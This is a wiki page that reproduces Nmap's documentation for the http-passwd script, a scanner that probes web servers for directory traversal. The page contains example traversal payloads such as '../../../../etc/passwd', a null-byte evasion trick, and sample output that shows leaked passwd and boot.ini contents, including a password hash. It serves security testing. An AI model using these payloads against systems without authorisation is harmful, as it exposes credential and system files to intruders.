Nmap: hack password via http

From OnnoWiki
Jump to navigation Jump to search

File http-passwd

Script types: portrule Categories: intrusive, vuln Download: https://svn.nmap.org/nmap/scripts/http-passwd.nse User Summary

Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.

The script uses several technique:

   Generic directory traversal by requesting paths like ../../../../etc/passwd.
   Known specific traversals of several web servers.
   Query string traversal. This sends traversals as query string parameters to paths that look like they refer to a local file name. The potential query is searched for in at the path controlled by the script argument http-passwd.root.

Script Arguments

http-passwd.root

Query string tests will be done relative to this path. The default value is /. Normally the value should contain a leading slash. The queries will be sent with a trailing encoded null byte to evade certain checks; see http://insecure.org/news/P55-01.txt. slaxml.debug See the documentation for the slaxml library. http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent See the documentation for the http library. smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername See the documentation for the smbauth library.

Example Usage

nmap --script http-passwd --script-args http-passwd.root=/test/ <target>

Script Output

80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "index.html?../../../../../boot.ini"
| Printing first 250 bytes:
| [boot loader]
| timeout=30
| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
| [operating systems]
|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "../../../../../../../../../../etc/passwd"
| Printing first 250 bytes:
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
| sshd:*:65532:65534::/:/bin/false
| ftp:*:65533:65534::/:/bin/false
|_nobody:*:65534:65534::/:/bin/false

Requires

   http
   shortport
   stdnse
   string

Authors:

   Kris Katterjohn
   Ange Gutek

License: Same as Nmap--See https://nmap.org/book/man-legal.html